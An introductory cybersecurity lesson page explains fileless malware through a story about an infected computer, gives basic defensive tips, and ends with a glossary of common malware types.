Skip to main content

Fileless Malware

It seems like nothing else could go wrong with this computer. If this was a game of malware bingo, you would be one step away from winning the jackpot. For fun, you investigate some command-line programs to see if they’ve been altered. Aaaand, did someone say bingo?

Cybersecurity_RansomwareGraphs_1-10.svg

Fileless malware is a type of malware that ‘lives off the land’ and uses legitimate tools and the user’s operating system to perform malicious activities like privilege escalation, data collection, and more. It’s incredibly hard to detect and almost always missed by antivirus software.

Unlike a Trojan Horse, fileless malware is not pretending to be legitimate software, it actually is a part of legitimate software. Fileless malware hides itself within the code of legitimate software, often altering existing code to make it malicious.

Certain programs, like Microsoft PowerShell, are particularly vulnerable to these attacks. Someone could use this attack vector to gather data, use your device resources to mine cryptocurrency, or even install other malware.

Your Suggestion

  • Did you download that antivirus yet? Still avoiding those suspicious links?
  • Disable command-line applications and macros not in use on the device.
  • Keep your applications and system up to date for the latest security updates.
  • Reboot the computer.

Review

What a day! On that horrible machine, you discovered:

  • Malware: Malicious code inserted into a system to cause damage or gain unauthorized access to a network

  • Adware: Unwanted software designed to throw advertisements on your screen

  • Virus: A malicious self-replacing application that attaches itself to other programs and executables without the permission of the user

  • Worm: Self-replicating code that copies itself from computer to computer without user intervention

  • Spyware: Malicious code downloaded without a user’s authorization which is then used to steal sensitive information and relay it to an outside party in a way that harms the original user

  • Trojan Horse: A type of contained, non-replicating malware that disguises itself as legitimate software in order to allow scammers and hackers access to a user’s system

  • Rootkit: A collection of malicious programs that secretly provide continued, privileged access to a system for an unauthorized user

  • Ransomware: Malicious code that will block a user’s access to data or threaten to publish sensitive data until they pay money to the malicious actor

  • Fileless Malware: A type of malware that ‘lives off the land’ and uses legitimate tools and the user’s operating system to perform malicious activities like privilege escalation, data collection, and more. It’s incredibly hard to detect and almost always missed by antivirus software